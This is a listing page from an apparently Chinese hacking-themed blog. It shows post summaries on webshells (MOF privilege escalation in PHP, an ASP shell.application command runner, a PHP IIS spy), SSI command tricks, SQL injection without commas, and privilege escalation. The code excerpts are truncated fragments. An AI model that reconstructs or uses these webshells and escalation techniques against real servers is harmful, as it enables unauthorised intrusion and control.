会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
err0">
你真的够努力吗?
博客园
首页
新随笔
联系
订阅
管理
上一页
1
···
19
20
21
22
23
24
25
26
下一页
2014年4月17日
你们以为运营商只是HTTP插点广告而已么?
摘要: 国内某邮件服务商,近期在某南方地区有大量客户反应登录时出错和异常,于是工作人员进行了一下跟进,发现如下: 首先,邮件服务商登陆页面为普通HTTP协议发送,提交时通过JS进行RSA加密(没错,JS的RSA),发送到SSO登陆点,然后进行登录,有些人一看RSA,应该挺安全的了,不过……在国内上网的大多数...
阅读全文
posted @ 2014-04-17 16:09 Hookjoy
阅读(705)
评论(0)
推荐(0)
2014年4月16日
cmd命令行查看windows版本
摘要: 1.ver命令不显示sp几C:\>verMicrosoft Windows XP [Version 5.1.2600]C:\>08:C:\Users\Administrator>verMicrosoft Windows [版本 6.1.7601]2.systeminfo | findstr /B /...
阅读全文
posted @ 2014-04-16 16:10 Hookjoy
阅读(21779)
评论(1)
推荐(2)
2014年4月14日
一次DEDECMS残废后台拿shell
只有注册用户登录后才能阅读该文。
阅读全文
posted @ 2014-04-14 20:26 Hookjoy
阅读(9)
评论(0)
推荐(0)
mof提权带回显带清楚命令版本.php
摘要: Win MOF ShellHost:User:Pass:DB: '.mysql_error().'');echo "";echo "Cmd:";echo "";echo "";echo "";echo "";echo "";echo "";echo "";echo "";echo "";if ...
阅读全文
posted @ 2014-04-14 20:19 Hookjoy
阅读(448)
评论(0)
推荐(0)
2014年4月12日
shell.application asp多种组件执行cmd 单文件版本
摘要: Err ThenIsObjInstalled = TrueElseIsObjInstalled = FalseEnd ifSet xTestObj = NothingErr = 0End Function%>支持组件:" & theComponent(i) & "√" & vbCrLfElseResponse.Write "" & theComponent(i) & "×" & vbCrLfEnd ifNext%> " & Err.Des
阅读全文
posted @ 2014-04-12 12:50 Hookjoy
阅读(1265)
评论(0)
推荐(0)
2014年4月7日
Shtml妙用
摘要: shtml用的是SSI指令,SSI指令虽然不多 但是功能相对而言还是很强大的,在PHP禁止了命令执行函数和开了安全模式的时候可以试试看也可以在服务器允许上传shtml后缀脚本的时候试试PS:只有服务器配置了允许执行SHTML才行 对于SSI 百度百科给出的解释是:SSI是为WEB服务器提供的一套命令,这些命令只要直接嵌入到HTML文档的注释内容之中即可。如: 就是一条SSI指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.htm其中的内容。他的指令我就不一样列举了 提几个有用的 //可以用来读文件 //可
阅读全文
posted @ 2014-04-07 21:45 Hookjoy
阅读(516)
评论(0)
推荐(0)
2014年4月5日
不用逗号进行UNION
摘要: ./download.php...if($link){ //加密后ID$link = base64_decode(urldecode($link));$link_array = explode(',', $link); if(is_array($link_array) && count($link_array)>0){$url = $link_array[0]; $contentid = $link_array[1];}}else{ //实现地址$contentid = $_GET['contentid'] ? $_GET['con
阅读全文
posted @ 2014-04-05 12:35 Hookjoy
阅读(296)
评论(0)
推荐(0)
2014年4月2日
TeamViewer替换连接提权
只有注册用户登录后才能阅读该文。
阅读全文
posted @ 2014-04-02 16:59 Hookjoy
阅读(12)
评论(0)
推荐(0)
2014年3月30日
PHP IIS SPY
摘要: Name)){ $webSite=new COM("IIS://localhost/w3svc/".$obj3w->Name.'/Root'); echo "[ID ] " .$obj3w->Name.''; echo "[NAME ] " .$obj3w->ServerComment.''; $state=intval($obj3w->ServerState); if ($state==2) { echo "[STATE ] running"
阅读全文
posted @ 2014-03-30 23:30 Hookjoy
阅读(441)
评论(0)
推荐(0)
Asp反向代理程序,调用远程站点全站数据,一款脚本级反向代理程序.
摘要: 前些天临时写的一脚本级反向代理程序,用法很简单,设置好目标站地址,然后放到你网站根目录:index.asp,再将404页面自定义为:index.asp,即可。由于暂时没有 url 替换需要,所以没有写 url 替换规则,如果你有需要的话,可以在末尾写个函数替换 http.ResponseBody 中的内容。 0 Then '提取参数 url = Mid(Request.QueryString, Len("404;http://" & Request.ServerVariables("HTTP_HOST") & ":&qu
阅读全文
posted @ 2014-03-30 22:39 Hookjoy
阅读(1148)
评论(0)
推荐(0)
上一页
1
···
19
20
21
22
23
24
25
26
下一页
公告